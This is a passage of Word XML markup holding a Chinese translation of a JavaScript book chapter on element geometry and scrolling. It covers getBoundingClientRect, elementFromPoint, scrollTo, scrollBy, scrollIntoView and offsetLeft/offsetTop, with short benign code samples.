      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性的对象。</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示元素的左上角的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标，</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示元素的右下角的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回元素在视口坐标中的位置。（</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法名中的</w:t>
      </w:r>
      <w:r>
        <w:t>"Client"</w:t>
      </w:r>
      <w:r>
        <w:t>是一种间接指代</w:t>
      </w:r>
      <w:r>
        <w:t>，它就是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器客户端</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>专指它定义的窗口或视口。）为了转化为甚至用户滚动浏览器窗口以后仍然有效的文档坐标，需要加上滚动的偏移量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var box=e.getBoundingClientRect();//</w:t>
      </w:r>
      <w:r>
        <w:t>获得在视口坐标中的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var offsets=getScrollOffsets();//</w:t>
      </w:r>
      <w:r>
        <w:t>上面定义的工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=box.left+offsets.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>转化为文档坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=box.top+offsets.y;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在很多浏览器（和</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>标准）中，</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的对象还包含</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但是在原始的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中未实现。为了简便起见，可以这样计算元素的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var box=e.getBoundingClientRect();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var w=box.width||(box.right-box.left);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var h=box.height||(box.bottom-box.top);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章中将学到元素内容被一块可选的空白区域所包围，叫做内边距。内边距被边框所包围，边框被外边距所包围。内边距、边框和外边距都是可选的。</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>所返回的坐标包含元素的边框和内边距，但不包含元素的外边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法名中的</w:t>
      </w:r>
      <w:r>
        <w:t>"Client"</w:t>
      </w:r>
      <w:r>
        <w:t>指定了返回的矩形的坐标系，那么方法名中的</w:t>
      </w:r>
      <w:r>
        <w:t>"Bounding"</w:t>
      </w:r>
      <w:r>
        <w:t>做何解释呢？浏览器在布局时块状元素（如图片、段落和＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素等）总是为矩形。但是，内联元素（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞等）可</w:t>
      </w:r>
      <w:r>
        <w:t>能跨了多行，因此可能由多个矩形组成。想象一下，例如，一些被断成两行的斜体文本（用＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签标记的）。它的形状是由</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第一行的右边部分和第二行的左边部分两个矩形组成的（假设文本顺序是从左向右）。如果在内联元素上调用</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>边界矩形</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。对于如上描述的＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，边界矩形会包含整整两行的宽度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想查询内联元素每个独立的矩形，调用</w:t>
      </w:r>
      <w:r>
        <w:t>getClientRects()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来获得一个只读的类数组对象，它的每个元素类似于</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>返</w:t>
      </w:r>
      <w:r>
        <w:t>回的矩形对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经见过如</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实时的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，当文档变化时这些结果能自动更新。但</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getClientRects()</w:t>
      </w:r>
      <w:r>
        <w:t>所返回的矩形对象（和矩形对象列表）并不是实时的。它们只是调用方法时文档视觉状态的静态快照，在用户滚动或改变浏览器窗口大小时不会更新它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="15_8_3_Pan_Ding_Yuan_Su_Zai_Mou_Dian_"/>
      <w:r>
        <w:t>15.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　判定元素在某点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使我们能在视口中判定元素的位置。但有时我们想反过来，判定在视口中的</w:t>
      </w:r>
      <w:r>
        <w:t>指定位置上有什么元素。这可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>elementFromPoint()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来判定。传递</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标（使用视口坐标而非文档坐标），该方法返回在指定位置的一个元素。在写本书的这段时间里，选取元素的算法还未详细</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指定，但是该方法的意图就是它返回在那个点的最里面的和最上面的（见</w:t>
      </w:r>
      <w:r>
        <w:t>16.2.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>属性）元素。如果指定的点在视口以外，</w:t>
      </w:r>
      <w:r>
        <w:t>elementFromPoint()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，即使该点在转换为文档坐标后是完美有效的，返回值也一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>elementFromPoint()</w:t>
      </w:r>
      <w:r>
        <w:t>方法看上去很</w:t>
      </w:r>
      <w:r>
        <w:t>有用，典型的案例是将鼠标指针的坐标传递给它来判定鼠标在哪个元素上。但是，我们将在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章学到，鼠标事件对象已经在</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性中包含了这些信息。因此，实际上</w:t>
      </w:r>
      <w:r>
        <w:t>elementFromPoint()</w:t>
      </w:r>
      <w:r>
        <w:t>不经常使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="15_8_4_Gun_Dong_"/>
      <w:r>
        <w:t>15.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　滚动</w:t>
      </w:r>
      <w:bookmarkEnd w:id="383"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何在浏览器窗口中查询滚动条的位置。该例子中的</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以用来设置让浏览器滚动，但有一种更简单的方法从</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>最早的时期开始就支持的。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（和其同义词</w:t>
      </w:r>
      <w:r>
        <w:t>scroll()</w:t>
      </w:r>
      <w:r>
        <w:t>）接受一个点的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标（文档坐标），并作为滚动条的偏移量设置它们。也就是，窗口滚动到指定的点出现在视口的左上角。如果指定的点太接近于文档的下边缘或右边缘，浏览器将尽量保证它和视口的左上角之间最近，但是无法达到一致。以下代码滚动浏览器到文档最下面的页面可见：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获得文档和视口的高度，</w:t>
      </w:r>
      <w:r>
        <w:t>offsetHeight</w:t>
      </w:r>
      <w:r>
        <w:t>会在下面解释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var documentHeight=document.documentElement.offsetHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var viewportHeight=window.innerHeight;//</w:t>
      </w:r>
      <w:r>
        <w:t>或使</w:t>
      </w:r>
      <w:r>
        <w:t>用上面的</w:t>
      </w:r>
      <w:r>
        <w:t>getViewportSize()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后，滚动让最后一页在视口中可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.scrollTo(0,documentHeight-viewportHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>scrollBy()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>scroll()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTo()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，但是它的参数是相对的，并在当前滚动条的偏移量上增加。例如，快速阅读者可能会喜欢这样的书签（见</w:t>
      </w:r>
      <w:r>
        <w:t>13.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒向下滚动</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>像素。注意，它无法关闭</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>javascript:void setInterval(function(){</w:t>
      </w:r>
      <w:r>
        <w:t>scrollBy(0,10)},200);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常，除了滚动到文档中用数字表示的位置，我们只是想它滚动使得文档中的某个元素可见。可以利用</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>计算元素的位置，并转换为文档坐标，然后用</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法达到目的。但是在需要显示的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上调用</w:t>
      </w:r>
      <w:r>
        <w:t>scrollIntoView()</w:t>
      </w:r>
      <w:r>
        <w:t>方法更加方便。该方法保证了元素能在视口中可见。默认情况下，它试图将元素的上边缘放在或尽量接近视口的上边缘。如果只传递</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数，它将试图将元素的下边缘放在或尽量接近视口的下边缘。只要</w:t>
      </w:r>
      <w:r>
        <w:t>有助于元素在视口内可见，浏览器也会水平滚动视口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>scrollIntoView()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为与设置</w:t>
      </w:r>
      <w:r>
        <w:t>window.location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>为一个命名锚点（＜</w:t>
      </w:r>
      <w:r>
        <w:t>a name=""</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）的名字后浏览器产生的行为类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="384" w:name="15_8_5_Guan_Yu_Yuan_Su_Chi_Cun___Wei_Zhi"/>
      <w:r>
        <w:t>15.8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　关于元素尺寸、位置和溢出的更多信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在所有当前的浏览器上都有定义，但如果需要支持老式浏览器，不能依靠此方法而必须使用更老的技术来判定元素的尺寸和位置。元素的尺寸比较简单：任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的只读属性</w:t>
      </w:r>
      <w:r>
        <w:t>offsetWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offsetHei</w:t>
      </w:r>
      <w:r>
        <w:t>ght</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素返回它的屏幕尺寸。返回的尺寸包含元素的边框和内边距，除去了外边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素拥有</w:t>
      </w:r>
      <w:r>
        <w:t>offsetLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offsetTop</w:t>
      </w:r>
      <w:r>
        <w:t>属性来返回元素的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。对于很多元素，这些值是文档坐标，并直接指定元素的位置。但对于已定位元素的后代元素和一些其他元素（如表格单元），这些属性返回的坐标是相对于祖先元素的而非文档。</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定这些属性所相对的父元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，这些属性都是文档坐标，因此，一般来说，用</w:t>
      </w:r>
      <w:r>
        <w:t>offsetLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offsetTop</w:t>
      </w:r>
      <w:r>
        <w:t>来计算</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的位置需要一个循环：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getElementPosition(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=0,y=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(e!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x+=e.offsetLeft;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y+=e.offsetTop;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>e=e.offsetParent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{x:x,y:y};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通过循环</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>对象链来累加偏移量，该函数计算指定元素的文档坐标。（回想一下</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的是视口坐标。）这里不能对元素的位置就一锤定音，尽管如此</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>getElementPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>函数也不总是计算正确的值，下面看看如何来修复它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这些名字以</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>开头的属性以外，所有的文档元素定义了其他两组属性，其名称一组以</w:t>
      </w:r>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:t>开头，另一组以</w:t>
      </w:r>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:t>开头。即，每个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素都有以下这些属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
